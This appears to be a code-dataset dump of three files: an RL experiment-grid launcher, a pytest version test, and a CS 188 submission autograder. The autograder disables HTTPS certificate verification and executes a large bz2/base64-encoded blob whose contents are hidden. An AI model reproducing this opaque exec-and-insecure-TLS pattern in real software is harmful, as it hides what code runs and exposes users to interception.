"density": ["keops_kernel_count"],
"density_state_scale": [0.06],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
# ball-in-cup
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["ball_in_cup", "ball_in_cup_explore"],
"task": ["catch"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.078],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.9],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
},
# finger
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["finger_explore"],
"task": ["turn_hard_narrow"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.11],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["finger"],
"task": ["turn_hard"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.11],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
# walker
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["walker_explore"],
"task": ["walk_narrow_sparse"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.16],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
{
# define the task
"_main": ["main_bbe.py"],
"eval_every": [1],
"env": ["walker"],
"task": ["walk"],
"seed": list(range(4, 8)),
# density settings
"density": ["keops_kernel_count"],
"density_state_scale": [0.16],
"density_action_scale": [1],
"density_max_obs": [2**15],
"density_tolerance": [0.5],
"density_conserve_weight": [True],
# task policy settings
"policy": ["sac"],
"policy_updates_per_step": [1],
},
]
# basename = "ufo_all_v3_moreseeds"
# grid = [
# # reacher
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # ball-in-cup
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.078],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # finger
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# # walker
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4, 8)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac"],
# "policy_updates_per_step": [1],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# },
# ]
# basename = "sacqex_all_v2"
# grid = [
# # reacher
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["reacher_explore"],
# "task": ["hard_narrow_init"],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["reacher"],
# "task": ["hard"],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.06],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# # ball-in-cup
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["ball_in_cup", "ball_in_cup_explore"],
# "task": ["catch"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.078],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# },
# # finger
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["finger_explore"],
# "task": ["turn_hard_narrow"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["finger"],
# "task": ["turn_hard"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.11],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# # walker
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["walker_explore"],
# "task": ["walk_narrow_sparse"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# {
# # define the task
# "_main": ["main_sac_qex.py"],
# "eval_every": [1],
# "env": ["walker"],
# "task": ["walk"],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.16],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.5],
# "density_conserve_weight": [True],
# # task policy settings
# "policy": ["sac_qex"],
# "policy_updates_per_step": [1],
# },
# ]
# basename = "hallway_midstart_all_v1"
# grid = [
# {
# # define the task
# "_main": ["main.py"],
# "eval_every": [1],
# "env": ["hallway_midstart"],
# "task": ["velocity_4_offset_p5", "velocity_4_offset_1",
# "velocity_4_offset_1p5", "velocity_4_offset_2",],
# "max_episodes": [500],
# "seed": list(range(4)),
# "no_exploration": [True, False],
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # novelty Q settings
# "uniform_update_candidates": [True],
# "n_updates_per_step": [2],
# "update_target_every": [2],
# # task policy settings
# "policy": ["sac"],
# },
# {
# # define the task
# "_main": ["main_bbe.py"],
# "eval_every": [1],
# "env": ["hallway_midstart"],
# "task": ["velocity_4_offset_p5", "velocity_4_offset_1",
# "velocity_4_offset_1p5", "velocity_4_offset_2",],
# "max_episodes": [500],
# "seed": list(range(4)),
# # density settings
# "density": ["keops_kernel_count"],
# "density_state_scale": [0.02],
# "density_action_scale": [1],
# "density_max_obs": [2**15],
# "density_tolerance": [0.9],
# "density_conserve_weight": [True],
# # bbe settings
# "bonus_scale": [0.1, 1,],
# # task policy settings
# "policy": ["sac"],
# },
# ]
if __name__ == '__main__':
jobs = construct_jobs(grid, basename)
if local:
asyncio.run(main(jobs, MULTIPLEX=MULTIPLEX, GPUS=GPUS, dry_run=dry_run))
else:
slurm_main(jobs, MULTIPLEX=MULTIPLEX, greene=greene, dry_run=dry_run)
| 27.937273 | 88 | 0.495005 | 3,084 | 30,731 | 4.596304 | 0.050259 | 0.035979 | 0.05037 | 0.049171 | 0.930582 | 0.928677 | 0.926843 | 0.923739 | 0.921834 | 0.920988 | 0 | 0.031533 | 0.316846 | 30,731 | 1,099 | 89 | 27.962693 | 0.64366 | 0.803553 | 0 | 0.585938 | 0 | 0 | 0.292717 | 0.049803 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.078125 | 0 | 0.078125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c3661f14ec5f2b38b81f6ede470c9d86f1dd6f8 | 98 | py | Python | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | tests/test_version.py | sondrelg/pytest-split | 9307bac36fd134c2244c80333e26c36b3e5316a1 | [
"MIT"
] | null | null | null | import pytest_split
def test_version() -> None:
assert pytest_split.__version__ is not None
| 16.333333 | 47 | 0.765306 | 14 | 98 | 4.857143 | 0.714286 | 0.323529 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173469 | 98 | 5 | 48 | 19.6 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8c3ba0947f5bf1269feb25e6a36b50fbc83e7faa | 8,943 | py | Python | P4_BNs_and_HMMs_Ghostbusters/submission_autograder.py | zheedong/CS188_Project | f10676e0dd6c7f0c46419dced2700c083bd7da72 | [
"MIT"
] | 1 | 2021-12-10T13:55:03.000Z | 2021-12-10T13:55:03.000Z | tracking/submission_autograder.py | abrarrhine/Artificial-Intelligence | 20e6b183fc458977f0a9c157d5e40d8487408c86 | [
"MIT"
] | 13 | 2021-08-23T14:08:47.000Z | 2022-01-18T08:38:40.000Z | P4_BNs_and_HMMs_Ghostbusters/submission_autograder.py | zheedong/CS188_Project | f10676e0dd6c7f0c46419dced2700c083bd7da72 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from codecs import open
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
"""
CS 188 Local Submission Autograder
Written by the CS 188 Staff
==============================================================================
_____ _ _
/ ____| | | |
| (___ | |_ ___ _ __ | |
\___ \| __/ _ \| '_ \| |
____) | || (_) | |_) |_|
|_____/ \__\___/| .__/(_)
| |
|_|
Modifying or tampering with this file is a violation of course policy.
If you're having trouble running the autograder, please contact the staff.
==============================================================================
"""
import bz2, base64
exec(bz2.decompress(base64.b64decode('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')))
